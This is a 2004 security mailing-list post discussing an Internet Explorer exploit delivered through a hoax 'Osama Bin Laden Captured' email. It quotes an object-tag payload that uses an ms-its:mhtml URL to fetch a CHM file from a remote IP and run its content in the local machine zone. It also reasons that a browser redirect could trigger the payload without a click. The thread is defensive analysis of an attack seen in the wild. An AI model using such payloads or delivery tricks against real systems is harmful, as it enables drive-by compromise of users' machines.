[Dshield] FW: Osama Bin Laden Captured
vancel at winfreeacademy.com
Mon Apr 26 14:52:08 GMT 2004
I believe that what happens here is that IE first tries to load the help
file "C:\foo.mht" and the '!' is used as a delimiter. Once it cannot
find the help file of "foo.htm" the second file is loaded as a failover
with the same permissions as the zone of the first option which is local
machine. If I read the documents correctly, it doesn't actually have to
download the chm file, unless IE has to download something like that
before it can execute it.
I don't see why you couldn't use a browser redirect to get to the
browser to automatically visit the URL with the hostile code.
I don't know the answers to your other two questions.
Pete Cap wrote:
>... object data=”ms-its:mhtml:file://c:\foo.mht!http://220.127.116.11/pics.chm::/pics.htm” type=”text/x-scriptlet”
>As far as the exploit goes, essentially what's happening is the browser is extracting foo.mht from pics.chm and executing it as C:\pics.htm, correct? And this can be any kind of executable content? Have I got this right?
>Couple of questions:
>1. Could you just use a browser redirect to start this process or is it essential that the user click on the link?
>2. Does the process by which the hostile content is retrieved need to be in an OBJECT tag or can it be in any data request (e.g. an IMG tag)?
>3. Why does one attempt in this example occur in a textarea?
>Hope someone can help.
Winfree Academy Charter Schools, Data-Business Office
1711 W. Irving Blvd. Ste 310
Irving, Tx 75061
More information about the list